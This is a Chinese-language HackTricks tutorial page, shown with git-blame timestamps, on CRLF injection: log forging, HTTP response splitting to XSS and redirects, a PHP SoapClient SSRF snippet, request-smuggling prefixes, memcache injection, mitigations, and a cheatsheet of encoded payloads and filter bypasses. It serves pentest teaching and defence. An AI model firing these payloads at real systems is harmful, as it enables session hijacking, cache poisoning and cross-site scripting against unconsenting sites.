2023-12-26 02:11:12 +00:00
|
|
|
|
# CRLF (%0D%0A) 注入
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
{% hint style="success" %}
|
|
|
|
|
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
|
|
|
学习与实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
<details>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
<summary>支持 HackTricks</summary>
|
2023-12-31 04:43:12 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
|
|
|
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
2024-07-19 15:59:20 +00:00
|
|
|
|
{% endhint %}
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2024-02-18 14:44:30 +00:00
|
|
|
|
<figure><img src="../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
|
2022-05-24 00:07:19 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
**漏洞赏金提示**:**注册** **Intigriti**,一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2024-02-18 14:44:30 +00:00
|
|
|
|
{% embed url="https://go.intigriti.com/hacktricks" %}
|
2022-05-24 00:07:19 +00:00
|
|
|
|
|
2024-02-05 20:18:17 +00:00
|
|
|
|
### CRLF
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
回车 (CR) 和换行 (LF),统称为 CRLF,是在 HTTP 协议中用于表示行结束或新行开始的特殊字符序列。Web 服务器和浏览器使用 CRLF 来区分 HTTP 头部和响应体。这些字符在各种 Web 服务器类型(如 Apache 和 Microsoft IIS)中普遍用于 HTTP/1.1 通信。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-05 20:18:17 +00:00
|
|
|
|
### CRLF 注入漏洞
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
CRLF 注入涉及将 CR 和 LF 字符插入用户提供的输入中。这一行为误导服务器、应用程序或用户将注入的序列解释为一个响应的结束和另一个响应的开始。虽然这些字符本身并不具害,但其误用可能导致 HTTP 响应分割和其他恶意活动。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-05 20:18:17 +00:00
|
|
|
|
### 示例:日志文件中的 CRLF 注入
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
[示例来自这里](https://www.invicti.com/blog/web-security/crlf-http-header/)
|
|
|
|
|
|
|
|
|
|
考虑一个管理员面板中的日志文件,其格式为:`IP - 时间 - 访问路径`。一个典型的条目可能看起来像:
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
123.123.123.123 - 08:15 - /index.php?page=home
|
|
|
|
|
```
|
2024-07-19 15:59:20 +00:00
|
|
|
|
攻击者可以利用CRLF注入来操纵此日志。通过在HTTP请求中注入CRLF字符,攻击者可以更改输出流并伪造日志条目。例如,注入的序列可能会将日志条目转换为:
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
/index.php?page=home&%0d%0a127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
|
|
|
|
|
```
|
2024-07-19 15:59:20 +00:00
|
|
|
|
这里,`%0d` 和 `%0a` 代表 CR 和 LF 的 URL 编码形式。攻击后,日志会误导性地显示:
|
2023-12-26 02:11:12 +00:00
|
|
|
|
```
|
2024-02-05 20:18:17 +00:00
|
|
|
|
IP - Time - Visited Path
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
|
|
|
|
123.123.123.123 - 08:15 - /index.php?page=home&
|
|
|
|
|
127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
|
|
|
|
|
```
|
2024-07-19 15:59:20 +00:00
|
|
|
|
攻击者通过使其恶意活动看起来像是本地主机(在服务器环境中通常被信任的实体)执行的操作,从而掩盖其恶意活动。服务器将以 `%0d%0a` 开头的查询部分解释为单个参数,而 `restrictedaction` 参数则被解析为另一个独立的输入。被操控的查询有效地模拟了一个合法的管理命令:`/index.php?page=home&restrictedaction=edit`
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
### HTTP 响应拆分
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
#### 描述
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
HTTP 响应拆分是一种安全漏洞,发生在攻击者利用 HTTP 响应的结构时。该结构使用特定字符序列将头部与主体分开,即回车(CR)后跟换行(LF),统称为 CRLF。如果攻击者设法在响应头中插入 CRLF 序列,他们可以有效地操控后续的响应内容。这种操控可能导致严重的安全问题,特别是跨站脚本(XSS)。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
#### 通过 HTTP 响应拆分进行 XSS
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
1. 应用程序设置一个自定义头,如:`X-Custom-Header: UserInput`
|
|
|
|
|
2. 应用程序从查询参数中获取 `UserInput` 的值,比如 "user\_input"。在缺乏适当输入验证和编码的情况下,攻击者可以构造一个包含 CRLF 序列及恶意内容的有效载荷。
|
|
|
|
|
3. 攻击者构造一个带有特殊构造的 'user\_input' 的 URL:`?user_input=Value%0d%0a%0d%0a<script>alert('XSS')</script>`
|
|
|
|
|
* 在这个 URL 中,`%0d%0a%0d%0a` 是 CRLFCRLF 的 URL 编码形式。它欺骗服务器插入一个 CRLF 序列,使服务器将后续部分视为响应主体。
|
|
|
|
|
4. 服务器在响应头中反映攻击者的输入,导致意外的响应结构,其中恶意脚本被浏览器解释为响应主体的一部分。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
#### HTTP 响应拆分导致重定向的示例
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-05-05 22:03:00 +00:00
|
|
|
|
来自 [https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62](https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
浏览器到:
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
/%0d%0aLocation:%20http://myweb.com
|
|
|
|
|
```
|
2024-07-19 15:59:20 +00:00
|
|
|
|
而服务器响应的头部是:
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
Location: http://myweb.com
|
|
|
|
|
```
|
2024-07-19 15:59:20 +00:00
|
|
|
|
**其他示例:(来自** [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)**)**
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
|
|
|
|
|
```
|
2024-07-19 15:59:20 +00:00
|
|
|
|
#### 在 URL 路径中
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
您可以将有效负载**放在 URL 路径中**以控制服务器的**响应**(示例来自[这里](https://hackerone.com/reports/192667)):
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
|
|
|
|
|
http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
|
|
|
|
|
```
|
2024-07-19 15:59:20 +00:00
|
|
|
|
Check more examples in:
|
2021-04-17 15:19:39 +00:00
|
|
|
|
|
2024-02-05 20:18:17 +00:00
|
|
|
|
{% embed url="https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md" %}
|
2021-04-17 15:20:44 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
### HTTP Header Injection
|
2021-04-17 15:20:44 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
HTTP Header Injection,通常通过 CRLF(回车和换行)注入进行利用,允许攻击者插入 HTTP 头。这可能会破坏安全机制,例如 XSS(跨站脚本)过滤器或 SOP(同源策略),可能导致对敏感数据(如 CSRF 令牌)的未经授权访问,或通过植入 cookie 操纵用户会话。
|
2021-04-17 15:20:44 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
#### Exploiting CORS via HTTP Header Injection
|
2021-04-17 15:20:44 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
攻击者可以注入 HTTP 头以启用 CORS(跨源资源共享),绕过 SOP 施加的限制。这一漏洞允许来自恶意来源的脚本与来自不同来源的资源进行交互,可能访问受保护的数据。
|
2021-04-17 15:19:39 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
#### SSRF and HTTP Request Injection via CRLF
|
2021-04-17 15:19:39 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
CRLF 注入可用于构造和注入一个全新的 HTTP 请求。一个显著的例子是 PHP 的 `SoapClient` 类中的漏洞,特别是在 `user_agent` 参数内。通过操纵此参数,攻击者可以插入额外的头和主体内容,甚至完全注入一个新的 HTTP 请求。以下是一个演示此利用的 PHP 示例:
|
2021-04-17 15:19:39 +00:00
|
|
|
|
```php
|
2023-08-03 19:12:22 +00:00
|
|
|
|
$target = 'http://127.0.0.1:9090/test';
|
2021-04-17 15:19:39 +00:00
|
|
|
|
$post_string = 'variable=post value';
|
|
|
|
|
$crlf = array(
|
2023-08-03 19:12:22 +00:00
|
|
|
|
'POST /proxy HTTP/1.1',
|
|
|
|
|
'Host: local.host.htb',
|
|
|
|
|
'Cookie: PHPSESSID=[PHPSESSID]',
|
|
|
|
|
'Content-Type: application/x-www-form-urlencoded',
|
|
|
|
|
'Content-Length: '.(string)strlen($post_string),
|
|
|
|
|
"\r\n",
|
|
|
|
|
$post_string
|
2021-04-17 15:19:39 +00:00
|
|
|
|
);
|
|
|
|
|
|
|
|
|
|
$client = new SoapClient(null,
|
2023-08-03 19:12:22 +00:00
|
|
|
|
array(
|
|
|
|
|
'uri'=>$target,
|
|
|
|
|
'location'=>$target,
|
|
|
|
|
'user_agent'=>"IGN\r\n\r\n".join("\r\n",$crlf)
|
|
|
|
|
)
|
2021-04-17 15:19:39 +00:00
|
|
|
|
);
|
|
|
|
|
|
2024-02-05 20:18:17 +00:00
|
|
|
|
# Put a netcat listener on port 9090
|
2021-04-17 15:19:39 +00:00
|
|
|
|
$client->__soapCall("test", []);
|
|
|
|
|
```
|
2024-07-19 15:59:20 +00:00
|
|
|
|
### Header Injection to Request Smuggling
|
2024-02-05 20:18:17 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
有关此技术和潜在问题的更多信息 [**请查看原始来源**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning)。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
您可以注入必要的头部,以确保 **后端在响应初始请求后保持连接打开**:
|
2022-10-05 09:28:25 +00:00
|
|
|
|
```
|
|
|
|
|
GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0a HTTP/1.1
|
|
|
|
|
```
|
2024-07-19 15:59:20 +00:00
|
|
|
|
在此之后,可以指定第二个请求。此场景通常涉及[HTTP request smuggling](http-request-smuggling/),这是一种技术,其中服务器在注入后附加的额外头部或主体元素可能导致各种安全漏洞。
|
2022-10-05 09:28:25 +00:00
|
|
|
|
|
2024-02-05 20:18:17 +00:00
|
|
|
|
**利用:**
|
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
1. **恶意前缀注入**:此方法涉及通过指定恶意前缀来毒害下一个用户的请求或网络缓存。一个例子是:
|
2022-10-05 09:28:25 +00:00
|
|
|
|
|
|
|
|
|
`GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/redirplz%20HTTP/1.1%0d%0aHost:%20oastify.com%0d%0a%0d%0aContent-Length:%2050%0d%0a%0d%0a HTTP/1.1`
|
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
2. **为响应队列毒害构造前缀**:此方法涉及创建一个前缀,当与尾部垃圾结合时,形成一个完整的第二个请求。这可以触发响应队列毒害。一个例子是:
|
2022-10-05 09:28:25 +00:00
|
|
|
|
|
|
|
|
|
`GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/%20HTTP/1.1%0d%0aFoo:%20bar HTTP/1.1`
|
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
### Memcache 注入
|
2023-02-16 13:29:30 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
Memcache 是一个**使用明文协议的键值存储**。更多信息请参见:
|
2023-02-16 13:29:30 +00:00
|
|
|
|
|
|
|
|
|
{% content-ref url="../network-services-pentesting/11211-memcache/" %}
|
|
|
|
|
[11211-memcache](../network-services-pentesting/11211-memcache/)
|
|
|
|
|
{% endcontent-ref %}
|
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
**有关完整信息,请阅读**[ **原始报告**](https://www.sonarsource.com/blog/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/)
|
2024-02-05 20:18:17 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
如果一个平台从**HTTP请求中获取数据并在未清理的情况下使用它**来向**memcache**服务器执行**请求**,攻击者可能会利用这种行为**注入新的 memcache 命令**。
|
2023-02-16 13:29:30 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
例如,在最初发现的漏洞中,缓存键用于返回用户应连接的 IP 和端口,攻击者能够**注入 memcache 命令**,这将**毒害**缓存以将受害者的详细信息(包括用户名和密码)发送到攻击者的服务器:
|
2023-02-16 13:29:30 +00:00
|
|
|
|
|
2024-05-05 22:03:00 +00:00
|
|
|
|
<figure><img src="../.gitbook/assets/image (659).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/ba72cd16-2ca0-447b-aa70-5cde302a0b88/body-578d9f9f-1977-4e34-841c-ad870492328f_10.png?w=1322&h=178&auto=format&fit=crop"><figcaption></figcaption></figure>
|
2023-02-16 13:29:30 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
此外,研究人员还发现,他们可以使 memcache 响应不同步,以将攻击者的 IP 和端口发送给攻击者不知道其电子邮件的用户:
|
2023-02-16 13:29:30 +00:00
|
|
|
|
|
2024-05-05 22:03:00 +00:00
|
|
|
|
<figure><img src="../.gitbook/assets/image (637).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/c6c1f3c4-d244-4bd9-93f7-2c88f139acfa/body-3f9ceeb9-3d6b-4867-a23f-e0e50a46a2e9_14.png?w=1322&h=506&auto=format&fit=crop"><figcaption></figcaption></figure>
|
2023-06-06 21:42:32 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
### 如何防止 Web 应用程序中的 CRLF / HTTP 头注入
|
2023-06-06 22:57:49 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
为了减轻 Web 应用程序中 CRLF(回车和换行)或 HTTP 头注入的风险,建议采取以下策略:
|
2023-02-16 13:29:30 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
1. **避免在响应头中直接使用用户输入**:最安全的方法是避免将用户提供的输入直接纳入响应头中。
|
|
|
|
|
2. **编码特殊字符**:如果无法避免直接用户输入,请确保使用专门用于编码特殊字符(如 CR 和 LF)的函数。这种做法可以防止 CRLF 注入的可能性。
|
|
|
|
|
3. **更新编程语言**:定期将用于 Web 应用程序的编程语言更新到最新版本。选择一个本质上不允许在设置 HTTP 头的函数中注入 CR 和 LF 字符的版本。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
### CHEATSHEET
|
2024-02-05 20:18:17 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
[Cheatsheet from here](https://twitter.com/NinadMishra5/status/1650080604174667777)
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
1. HTTP Response Splitting
|
2021-06-23 17:08:03 +00:00
|
|
|
|
• /%0D%0ASet-Cookie:mycookie=myvalue (Check if the response is setting this cookie)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
|
|
|
|
2. CRLF chained with Open Redirect
|
2023-08-03 19:12:22 +00:00
|
|
|
|
• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2
|
2020-07-15 15:43:14 +00:00
|
|
|
|
• /www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2
|
|
|
|
|
• /google.com/%2F..%0D%0AHeader-Test:test2
|
|
|
|
|
• /%0d%0aLocation:%20http://example.com
|
|
|
|
|
|
|
|
|
|
3. CRLF Injection to XSS
|
|
|
|
|
• /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
|
|
|
|
|
• /%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
|
|
|
|
|
|
|
|
|
|
4. Filter Bypass
|
|
|
|
|
• %E5%98%8A = %0A = \u560a
|
|
|
|
|
• %E5%98%8D = %0D = \u560d
|
|
|
|
|
• %E5%98%BE = %3E = \u563e (>)
|
|
|
|
|
• %E5%98%BC = %3C = \u563c (<)
|
|
|
|
|
• Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test
|
|
|
|
|
```
|
2024-07-19 15:59:20 +00:00
|
|
|
|
## 自动工具
|
2020-09-11 09:44:53 +00:00
|
|
|
|
|
2023-12-16 14:32:12 +00:00
|
|
|
|
* [https://github.com/Raghavd3v/CRLFsuite](https://github.com/Raghavd3v/CRLFsuite)
|
|
|
|
|
* [https://github.com/dwisiswant0/crlfuzz](https://github.com/dwisiswant0/crlfuzz)
|
2020-09-11 09:44:53 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
## 暴力破解检测列表
|
2021-06-27 21:56:13 +00:00
|
|
|
|
|
2023-12-16 14:32:12 +00:00
|
|
|
|
* [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt](https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt)
|
2021-06-27 21:56:13 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
## 参考资料
|
2024-02-18 14:44:30 +00:00
|
|
|
|
|
2024-02-05 20:18:17 +00:00
|
|
|
|
* [**https://www.invicti.com/blog/web-security/crlf-http-header/**](https://www.invicti.com/blog/web-security/crlf-http-header/)
|
2022-04-05 22:24:52 +00:00
|
|
|
|
* [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)
|
2023-02-16 13:29:30 +00:00
|
|
|
|
* [**https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning)
|
2024-02-05 20:18:17 +00:00
|
|
|
|
* [**https://www.netsparker.com/blog/web-security/crlf-http-header/**](https://www.netsparker.com/blog/web-security/crlf-http-header/)
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2024-02-18 14:44:30 +00:00
|
|
|
|
<figure><img src="../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
|
2022-05-24 00:07:19 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
**漏洞赏金提示**: **注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
|
2022-05-24 00:07:19 +00:00
|
|
|
|
|
2024-02-18 14:44:30 +00:00
|
|
|
|
{% embed url="https://go.intigriti.com/hacktricks" %}
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
{% hint style="success" %}
|
|
|
|
|
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
|
|
|
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
<details>
|
2023-12-31 04:43:12 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
<summary>支持 HackTricks</summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2024-07-19 15:59:20 +00:00
|
|
|
|
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
|
|
|
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
2024-07-19 15:59:20 +00:00
|
|
|
|
{% endhint %}
|